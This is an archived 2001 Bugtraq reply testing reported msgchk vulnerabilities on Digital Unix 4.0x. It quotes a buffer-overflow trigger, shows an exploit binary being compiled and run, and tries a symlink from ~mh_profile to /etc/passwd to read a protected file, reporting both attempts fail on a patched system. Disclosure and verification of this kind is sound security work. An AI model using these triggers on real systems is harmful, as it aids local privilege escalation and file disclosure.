FW: Digital Unix 4.0x msgchk multiple vulnerabilities
daemon@ATHENA.MIT.EDU (Boyce, Nick)
Wed Sep 12 12:10:37 2001
Message-ID: <5F5FDD4B3580D511B3700002A57493F8046E4A@GBHBM201>
From: "Boyce, Nick" <nick.boyce@eds.com>
To: "'Bugtraq Mailing List'" <bugtraq@securityfocus.com>
Date: Wed, 12 Sep 2001 10:54:41 +0100
[Resend: my original reply to Bugtraq on Monday 10th has not appeared, and
I haven't seen any other followup; this time I've replaced all weird >
ASCII 127 characters in my screen dumps by X's in case that prevented my
email's handling by some MTA somewhere]
On 10 September 2001 03:54, SeungHyun Seo said:
> there were multiple vulnerabilities in "/usr/bin/mh/msgchk" on digital
> unix 4.0x. it's a mail utility - check for messages (only available within
> the message handling system, mh)
[...]
> /usr/bin/mh/msgchk is affected by a buffer overflow vulnerability
>
> -- snip --
> $ /usr/bin/mh/msgchk `perl -e 'print "A"x9000'`
> AAAAAAAAAAAAA ... ...
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA :
> msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAA ... ...
> AAAAAAAAAAAAAAAAAAAAAAA
> Memory fault(coredump)
> -- snip --
NOT confirmed. On my system (Digital Unix 4.0D, Patch Kit 5) this gives me:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
AAAAAAAAAAAAAA :
msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
followed by another command prompt.
And the exploit doesn't work:
/usr/users/joesoap/bin>cc msgbreak.c -o msgbreak -std
/usr/users/joesoap/bin>msgbreak
I'm going to create the standard MH path for you.
AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
.... [lots of pairs of "G" followed by "y" with an upsilon accent]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
.... [even more A's]
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA XX :
msgchk: no such user as AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
/usr/users/joesoap/bin>whoami
joesoap
/usr/users/joesoap/bin>uname -a
OSF1 mybox V4.0 878 alpha
(Lines wrapped for readability, and unprintable blobs replaced by X's.)
Looks like there must have been a patch for this somewhere in Patch Kits 1 through 5.
Or maybe the hole only exists *prior* to 4.0D.
Part 2:
> Next, /usr/bin/mh/msgchk has a vulnerability that lets anyone read 1 line
> of an unprivileged file on the system. It's an old bug on Red Hat Linux 2.0,
> but it also works on Digital Unix 4.0x
This hole doesn't work either:
/usr/users/joesoap>ln -sf /etc/passwd ./~mh_profile
/usr/users/joesoap>/usr/bin/mh/msgchk
joesoap :
No file-source mail waiting; last read on Wed, 27 Sep 2000 17:48:21 BST
/usr/users/joesoap>head -2 ./~mh_profile
root:xxxxxxxxxxxxx:0:1:system PRIVILEGED account:/:/bin/csh
nobody:*Nologin:65534:65534:anonymous NFS user:/:
Nick Boyce
EDS, Bristol, UK